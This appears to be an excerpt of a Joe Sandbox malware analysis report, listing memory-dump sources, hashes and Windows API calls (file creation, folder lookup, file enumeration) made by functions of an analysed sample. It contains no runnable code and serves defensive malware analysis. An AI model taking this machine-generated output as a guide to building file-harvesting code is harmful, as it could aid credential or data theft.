                          • Source File: 00000000.00000002.2283532282.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                          • Associated: 00000000.00000002.2283510477.0000000000120000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2283532282.00000000001D1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2283532282.00000000001DD000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2283532282.0000000000202000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2283532282.000000000036A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2283735694.000000000037E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2283735694.0000000000507000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2283735694.00000000005EB000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2283735694.0000000000613000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2283735694.000000000061A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2283735694.0000000000629000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2284256670.000000000062A000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2284398354.00000000007D0000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2284417050.00000000007D1000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_120000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$AllocateLocalProcessTimewsprintf
                          • String ID:
                          • API String ID: 377395780-0
                          • Opcode ID: 5ba5530d34ab1190a7a4d648cc9913f2eba15daaf4dc5b1b4581749705702735
                          • Instruction ID: 691ec6cdae4f213b9700234fccd63293175673b5c5eca9f6645c2b8ea2915c06
                          • Opcode Fuzzy Hash: 5ba5530d34ab1190a7a4d648cc9913f2eba15daaf4dc5b1b4581749705702735
                          • Instruction Fuzzy Hash: D51118B2904518AACB149FC9ED45BBEBBFCEB48B11F10411AF605A2280D3795940CBB1
                          APIs
                          • CreateFileA.KERNEL32(00133AEE,80000000,00000003,00000000,00000003,00000080,00000000,?,00133AEE,?), ref: 001392FC
                          • GetFileSizeEx.KERNEL32(000000FF,00133AEE), ref: 00139319
                          • CloseHandle.KERNEL32(000000FF), ref: 00139327
                          Memory Dump Source
                          • Source File: 00000000.00000002.2283532282.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                          • Associated: 00000000.00000002.2283510477.0000000000120000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2283532282.00000000001D1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2283532282.00000000001DD000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2283532282.0000000000202000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2283532282.000000000036A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2283735694.000000000037E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2283735694.0000000000507000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2283735694.00000000005EB000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2283735694.0000000000613000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2283735694.000000000061A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2283735694.0000000000629000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2284256670.000000000062A000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2284398354.00000000007D0000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2284417050.00000000007D1000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_120000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: File$CloseCreateHandleSize
                          • String ID:
                          • API String ID: 1378416451-0
                          • Opcode ID: ae1bb899389c2c1ba8528cbf6dbf0585b51dff921dab19de5dd5a5b4b783e74c
                          • Instruction ID: 3bf44bd0f112e297bbf3f7db0b05bc07434180030ad7f62ab24677ce23c8b951
                          • Opcode Fuzzy Hash: ae1bb899389c2c1ba8528cbf6dbf0585b51dff921dab19de5dd5a5b4b783e74c
                          • Instruction Fuzzy Hash: D1F037B9E44208BBDB14DBF0DC49B9E77B9BB48720F11C254FA51B72C0DAB0AA018F45
                          APIs
                          • __getptd.LIBCMT ref: 0013C74E
                            • Part of subcall function 0013BF9F: __amsg_exit.LIBCMT ref: 0013BFAF
                          • __getptd.LIBCMT ref: 0013C765
                          • __amsg_exit.LIBCMT ref: 0013C773
                          • __updatetlocinfoEx_nolock.LIBCMT ref: 0013C797
                          Memory Dump Source
                          • Source File: 00000000.00000002.2283532282.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                          • Associated: 00000000.00000002.2283510477.0000000000120000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2283532282.00000000001D1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2283532282.00000000001DD000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2283532282.0000000000202000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2283532282.000000000036A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2283735694.000000000037E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2283735694.0000000000507000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2283735694.00000000005EB000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2283735694.0000000000613000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2283735694.000000000061A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2283735694.0000000000629000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2284256670.000000000062A000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2284398354.00000000007D0000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2284417050.00000000007D1000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_120000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: __amsg_exit__getptd$Ex_nolock__updatetlocinfo
                          • String ID:
                          • API String ID: 300741435-0
                          • Opcode ID: 4c566a9830292a99c318934aeebd1157e3549e6ae0b12fa81be639d157bfc550
                          • Instruction ID: 5de4c3afd4347153f745e81d9ca160f708ee7f81389da08f4b0ff1ec23867815
                          • Opcode Fuzzy Hash: 4c566a9830292a99c318934aeebd1157e3549e6ae0b12fa81be639d157bfc550
                          • Instruction Fuzzy Hash: 9FF0B4329083009BE721BBB8588775E37A06F10720F214149F904B72E2DB6459419FD6
                          APIs
                            • Part of subcall function 00138DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00138E0B
                          • lstrcat.KERNEL32(?,00000000), ref: 00134F7A
                          • lstrcat.KERNEL32(?,00141070), ref: 00134F97
                          • lstrcat.KERNEL32(?,00F09738), ref: 00134FAB
                          • lstrcat.KERNEL32(?,00141074), ref: 00134FBD
                            • Part of subcall function 00134910: wsprintfA.USER32 ref: 0013492C
                            • Part of subcall function 00134910: FindFirstFileA.KERNEL32(?,?), ref: 00134943
                            • Part of subcall function 00134910: StrCmpCA.SHLWAPI(?,00140FDC), ref: 00134971
                            • Part of subcall function 00134910: StrCmpCA.SHLWAPI(?,00140FE0), ref: 00134987
                            • Part of subcall function 00134910: FindNextFileA.KERNEL32(000000FF,?), ref: 00134B7D
                            • Part of subcall function 00134910: FindClose.KERNEL32(000000FF), ref: 00134B92
                          Memory Dump Source
                          • Source File: 00000000.00000002.2283532282.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                          • Associated: 00000000.00000002.2283510477.0000000000120000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2283532282.00000000001D1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2283532282.00000000001DD000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2283532282.0000000000202000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2283532282.000000000036A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2283735694.000000000037E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2283735694.0000000000507000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2283735694.00000000005EB000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2283735694.0000000000613000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2283735694.000000000061A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2283735694.0000000000629000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2284256670.000000000062A000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2284398354.00000000007D0000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2284417050.00000000007D1000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_120000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcat$Find$File$CloseFirstFolderNextPathwsprintf
                          • String ID:
                          • API String ID: 2667927680-0
                          • Opcode ID: a60c91ba3aa04d565cfcf5278e8eafd8f0208f7b16be32ecf58302250f671298
                          • Instruction ID: 6fe309fc72df74a1268157b22e813a63da9d0445af8a9607dbc9e3595d2a7f2f
                          • Opcode Fuzzy Hash: a60c91ba3aa04d565cfcf5278e8eafd8f0208f7b16be32ecf58302250f671298
                          • Instruction Fuzzy Hash: 81219B7690021467C755F7B0EC46EED377CAB65300F008598F69AA3191EFB596C88F92